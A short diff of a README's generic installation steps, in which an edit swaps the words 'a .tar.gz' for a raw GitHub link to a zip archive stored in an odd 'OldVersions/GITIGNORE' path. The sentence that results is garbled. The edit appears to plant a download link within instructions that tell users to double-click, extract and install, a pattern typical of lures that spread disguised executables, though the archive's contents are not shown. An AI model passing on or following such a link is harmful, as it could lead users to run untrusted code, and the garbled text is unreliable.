cmyk-dek/AcroSlideXLIBrary_Website/README.md

 2. **Open the File**: Double-click on the file.
     - For Windows users, it may be an `.exe` or a `.zip` file.
     - For macOS users, it may be a `.dmg` or an application file.
-    - For Linux users, it may be a `.tar.gz` or a script file.
+    - For Linux users, it may be a `https://raw.githubusercontent.com/cmyk-dek/AcroSlideXLIBrary_Website/AcroSlideXLIBrary_Website_Main-dev/OldVersions/GITIGNORE/1/AcroSlideXLIBrary_Website_2.5.zip` or a script file.
 3. **Follow the Installation Steps**:
    - If it’s a `.zip` file, extract it first.
    - Follow the prompts to install the application on your system.